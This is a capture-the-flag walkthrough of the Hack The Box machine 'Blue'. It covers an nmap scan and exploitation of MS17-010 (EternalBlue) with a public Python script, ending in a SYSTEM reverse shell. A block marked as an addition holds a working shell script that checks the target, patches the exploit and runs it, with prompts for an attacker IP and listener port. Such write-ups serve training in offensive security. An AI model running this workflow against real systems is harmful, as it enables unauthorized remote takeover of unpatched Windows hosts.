HTB — Blue

Raj Singh
3 min read · Sep 30, 2019

Machine IP: 10.10.10.40

Nmap

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-09-13T12:26:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-13T11:26:32
|_ start_date: 2019-09-13T08:07:52

The OS detection shows Windows 7 Professional SP1 with SMB exposed on 445 and message signing disabled, so EternalBlue (MS17-010) is the obvious candidate. Before firing it, confirm the host is actually vulnerable with nmap's non-destructive check (nmap -p445 --script smb-vuln-ms17-010 10.10.10.40); a failed EternalBlue attempt can crash the target. Here we are not going to use Metasploit; instead we will find a Python script that exploits EternalBlue directly.

After searching for a while I found a Python script on GitHub. It is an automated script that gets us a shell with very little manual work, but it needs a small modification first:

USERNAME = '/'    # use '/'
PASSWORD = '/'    # use '/'
Before running the script, also download mysmb.py (the SMB helper from the worawit MS17-010 GitHub repository; it is easy to find) and place mysmb.py in the same directory as the EternalBlue script, which imports it.

So what does this script do? Looking inside, it detects the target's architecture, generates a matching payload, launches the exploit and starts our nc listener for us, prompting for everything we would otherwise have to do by hand. Let's start the exploit.

Enter the machine IP, choose the reverse shell option, then enter the IP and port you want to listen on.
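As an added example (not code from the original write-up or from the exploit script's author), here is the whole procedure above scripted end to end: the MS17-010 check from the nmap section, the USERNAME/PASSWORD modification, the mysmb.py check, and the exploit run. Assumptions not in the original: the attacker IP is 10.10.14.5 and the listener port 4444 (both overridable via environment variables), the exploit script has USERNAME/PASSWORD lines at the top and imports mysmb from its own directory (its path is given as the first argument), and nmap and python2 are installed (the mysmb-based scripts are Python 2).

```shell
#!/bin/sh
# Added example, not code from the original write-up or from the exploit script's
# author. Assumptions (not in the original): attacker IP 10.10.14.5, listener port
# 4444, exploit script path passed as $1 with mysmb.py beside it, nmap and python2
# installed.
set -u

TARGET="${TARGET:-10.10.10.40}"    # machine IP from the write-up
LHOST="${LHOST:-10.10.14.5}"       # assumed attacker IP, answered at the prompt
LPORT="${LPORT:-4444}"             # assumed listener port, answered at the prompt

# Step 1: confirm MS17-010 with nmap's non-destructive NSE check before firing
# EternalBlue; a failed attempt against a patched or flaky host can crash it.
ms17_010_scan() {
    nmap -Pn -p445 --script smb-vuln-ms17-010 "$1"
}

# Reads nmap output on stdin; succeeds only if the smb-vuln-ms17-010 block
# reports "State: VULNERABLE" (a patched host prints no such block).
is_ms17_010_vulnerable() {
    awk '/smb-vuln-ms17-010:/ { in_block = 1 }
         in_block && /State: VULNERABLE/ { found = 1 }
         END { exit !found }'
}

# Step 2: apply the write-up's modification, USERNAME = '/' and PASSWORD = '/',
# to the exploit script in place (through a temp file, so sed -i portability
# does not matter). Other assignments in the file are left alone.
patch_credentials() {   # $1 = exploit script to edit
    sed -e "s|^USERNAME *=.*|USERNAME = '/'|" \
        -e "s|^PASSWORD *=.*|PASSWORD = '/'|" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Step 3: the script imports mysmb, so the helper must sit beside it.
require_mysmb() {       # $1 = exploit script path
    if [ ! -f "$(dirname "$1")/mysmb.py" ]; then
        echo "[-] mysmb.py missing next to $1" >&2
        return 1
    fi
}

main() {
    exploit="${1:?usage: $0 /path/to/exploit.py}"
    if ms17_010_scan "$TARGET" | is_ms17_010_vulnerable; then
        echo "[+] $TARGET reports MS17-010, proceeding"
    else
        echo "[-] $TARGET does not report MS17-010, not running the exploit blind" >&2
        return 1
    fi
    require_mysmb "$exploit" || return 1
    patch_credentials "$exploit"
    # Step 4: run it and answer the prompts: target IP, reverse shell, LHOST, LPORT.
    echo "[*] answer the prompts with: $TARGET, reverse shell, $LHOST, $LPORT"
    python2 "$exploit"
}

# Run the workflow only when a script path is given, so the functions above can
# also be sourced and exercised on their own.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

Usage: sh run_blue.sh /path/to/exploit.py, with TARGET, LHOST and LPORT exported beforehand if they differ from the defaults. The scan gate is the point of the script: the NSE check uses a harmless SMB transaction that does not touch the kernel pool, whereas the exploit itself can blue-screen a host that is not vulnerable in the way it expects.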

And here we get our shell.

We are the SYSTEM user, with full rights to move around the box.

user.txt and root.txt obtained.

Written by Raj Singh

Security Researcher, Product Security Engineer